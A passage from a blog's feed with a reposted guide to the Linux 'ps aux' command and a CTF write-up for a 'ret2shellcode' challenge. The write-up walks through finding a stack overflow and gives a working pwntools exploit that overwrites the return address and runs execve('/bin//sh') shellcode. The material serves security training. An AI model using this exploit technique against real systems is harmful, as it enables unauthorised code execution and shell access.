<id>https://www.rgzzplus.com/2022/09/05/Linux%E6%9F%A5%E7%9C%8B%E7%B3%BB%E7%BB%9F%E8%BF%9B%E7%A8%8B/</id>
<published>2022-09-05T13:25:27.000Z</published>
<updated>2022-09-05T13:33:47.013Z</updated>
<content type="html"><![CDATA[<p>Reposted from: <a href="https://cloud.tencent.com/developer/article/1711858">LINUX查看进程的4种方法(小结)</a></p><p>A process is program code running on the CPU and in memory; each process can create one or more further processes (parent and child processes).</p><p><strong>How to view processes:</strong></p><p><strong>Method 1:</strong></p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps aux</span><br></pre></td></tr></table></figure><p><strong>ps reports the state of the processes on the system.</strong> Paired with kill, it can interrupt or remove unwanted programs at any time. ps is the most basic and at the same time a very powerful process viewer: with it you can tell which processes are running and in what state, whether a process has exited or become a zombie, which processes are using too many resources, and so on; most of what you need to know comes from this one command.</p><p>a: show processes on all terminals, including those of other users.</p><p>u: user-oriented output format.</p><p>x: also include processes that have no controlling terminal.</p><p>Example:</p><p><img src="/2022/09/05/Linux%E6%9F%A5%E7%9C%8B%E7%B3%BB%E7%BB%9F%E8%BF%9B%E7%A8%8B/1620.png" alt="img"></p><p><strong>Meaning of the columns above:</strong></p><p>USER: the account that started the process. PID: the process ID, unique on the current system. %CPU: CPU usage in percent. %MEM: memory usage in percent.</p><p>VSZ: virtual memory size (in KiB). RSS: resident set size, i.e. the physical memory in use.</p><p>TTY: the terminal the process runs on; "?" means unknown or no terminal needed. STAT: the current state, e.g. S (sleeping), R (running), Z (zombie), &lt; (high priority), N (low priority), s (session leader), + (foreground process group). A zombie cannot be killed itself; it disappears once its parent reaps it or is terminated.</p><p>START: the time the process was started. TIME: CPU time consumed. COMMAND: the command that started the process.</p><p><strong>Summary: ps aux shows process information as a simple list.</strong></p>]]></content>
<summary type="html"><p>Reposted from: <a href="https://cloud.tencent.com/developer/article/1711858">LINUX查看进程的4种方法(小结)</a></p>
<p>A process is program code running on the CPU and in memory; each process can create one or more further processes (parent</summary>
<category term="Reposted" scheme="https://www.rgzzplus.com/categories/%E8%BD%AC%E8%BD%BD/"/>
<category term="system processes" scheme="https://www.rgzzplus.com/tags/%E7%B3%BB%E7%BB%9F%E8%BF%9B%E7%A8%8B/"/>
</entry>
<entry>
<title>ret2shellcode</title>
<link href="https://www.rgzzplus.com/2022/09/05/ret2shellcode/"/>
<id>https://www.rgzzplus.com/2022/09/05/ret2shellcode/</id>
<published>2022-09-05T11:54:06.000Z</published>
<updated>2022-09-05T11:56:29.086Z</updated>
<content type="html"><![CDATA[<h1 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h1><blockquote><p><a href="https://www.ctfhub.com/#/skilltree">Challenge page</a></p></blockquote><p>Given the binary, first check the file type and the protection mechanisms.<br><img src="/2022/09/05/ret2shellcode/image-20220903235214002.png" alt="image-20220903235214002"></p><p>It has no execute bit. After adding one and running it, it does a simple read and write, but it also seems to hand us an address.</p><h1 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h1><p>Next, load the program into IDA and decompile it:<br><img src="/2022/09/05/ret2shellcode/image-20220904000019546.png" alt="image-20220904000019546"></p><p>Nothing in the program refers to the flag, so the flag must be stored on the server.</p><p>The program reads input into buf[] with read(), and no stack protection is enabled, which gives us a stack overflow.<br>Remember the address printed earlier? The decompiled code shows it is the address of buf.</p><h1 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h1><p>That gives the plan: send enough input to overwrite the saved rbp and the return address after it.<br>The challenge name, ret2shellcode, says we end up with a shell, but the binary contains no code that spawns one, so we bring our own shellcode.</p><h1 id="0x4"><a class="markdownIt-Anchor" href="#0x4"></a> 0x4</h1><p>The <strong>information we need</strong>:</p><ul><li>the address of buf[]</li><li>the distance from buf[] to the saved return address</li><li>the shellcode</li></ul><p>(1) The address of buf[] is in the program's output; we have to extract it.<br><img src="/2022/09/05/ret2shellcode/image-20220904002822097.png" alt="image-20220904002822097"></p><blockquote><p><code>recvuntil</code>( <em>delims</em> , <em>drop=False</em> , <em>timeout=default</em> ) → bytes [<a href="https://github.com/Gallopsled/pwntools/blob/493a3e3d92/pwnlib/tubes/tube.py#L273-L361">source]</a></p><p>Receive data until one of delims is encountered.</p><p>If the request is not satisfied within <code>timeout</code> seconds, all data is buffered and an empty string (<code>''</code>) is returned.</p><ul><li><pre><code> Parameters:</code></pre><strong>delims</strong> ( <a href="https://docs.python.org/3.8/library/stdtypes.html#bytes"><em>bytes</em></a> <em>,</em> <a href="https://docs.python.org/3.8/library/stdtypes.html#tuple"><em>tuple</em></a> ) – byte string of delimiters, or list of delimiter byte strings.<br><strong>drop</strong> ( <a href="https://docs.python.org/3.8/library/functions.html#bool"><em>bool</em></a> ) – drop the ending. If <code>True</code> it is removed from the end of the return value.</li><li><pre><code> Raises: **exceptions.EOFError** – the connection closed before the request could be satisfied </code></pre></li><li><pre><code> Returns: a string containing bytes received from the socket, or `''` if a timeout occurred while waiting. </code></pre></li></ul><p>From: <a href="https://docs.pwntools.com/en/stable/tubes.html">pwntools</a></p></blockquote><p>(2) The distance</p><p>Method 1: read it off the assembly. buf[] sits 0x10 below the saved rbp, and the return address is 8 bytes above that: 0x10 + 8 = 24<sub>10</sub><br><img src="/2022/09/05/ret2shellcode/image-20220904002551439.png" alt="image-20220904002551439"></p><p>Method 2: peda</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda pwn</span><br><span class="line">pattern create 200 //generate a 200-byte cyclic pattern (any length works); copy it</span><br><span class="line">r //run the program and paste the pattern as the input</span><br><span class="line"></span><br><span class="line">pattern offset &lt;value&gt; //the value that landed in the return slot; prints its offset in the pattern</span><br></pre></td></tr></table></figure><p><img src="/2022/09/05/ret2shellcode/image-20220904002120603.png" alt="image-20220904002120603"></p><p><img src="/2022/09/05/ret2shellcode/image-20220904002141581.png" alt="image-20220904002141581"></p><p><img src="/2022/09/05/ret2shellcode/image-20220904002212274.png" alt="image-20220904002212274"></p><p><img src="/2022/09/05/ret2shellcode/image-20220904002358262.png" alt="image-20220904002358262"></p><p>(3) The shellcode</p><ul><li>write it yourself: <a href="https://www.rgzzplus.com/2022/08/05/Linux-shellcode%E5%BC%80%E5%8F%91%E5%85%A5%E9%97%A8/">Getting started with shellcode development</a></li><li>generate it with pwntools: <code>shellcraft.sh()</code></li></ul><h1 id="0x5"><a class="markdownIt-Anchor" href="#0x5"></a> 0x5</h1><p><strong>exp:</strong></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>* </span><br><span class="line"></span><br><span class="line">context(os=<span class="string">'linux'</span>, arch=<span class="string">'amd64'</span>, log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">"./pwn"</span>)</span><br><span class="line"><span class="comment"># p = connect('challenge-47138fa4ef483fb7.sandbox.ctfhub.com',33570)</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b'['</span>)</span><br><span class="line">buf_addr = p.recvuntil(<span class="string">b']'</span>, drop=<span class="literal">True</span>)  <span class="comment"># the leaked address of buf, as printed between [ and ]</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(buf_addr)</span><br><span class="line">shellcode = <span class="string">b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"</span>  <span class="comment"># execve("/bin//sh")</span></span><br><span class="line"><span class="comment">#shellcode = asm(shellcraft.sh())</span></span><br><span class="line">payload = <span class="string">b"a"</span>*<span class="number">24</span> + p64(<span class="built_in">int</span>(buf_addr,<span class="number">16</span>)+<span class="number">32</span>)+shellcode  <span class="comment"># 24 bytes to the return address, which points at buf+32 where the shellcode starts</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">"Input someting :"</span>,payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Finally, connect to the remote instance to get the flag: <code>ls</code> shows a flag file, and <code>cat flag</code> prints it.</p>]]></content>
<summary type="html"><h1 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h1>
<blockquote>
<p><a href="https://www.ctfhub.com/#/skilltree">Challenge link</a></p></blockquote></summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ret2shellcode" scheme="https://www.rgzzplus.com/tags/ret2shellcode/"/>
</entry>
</feed>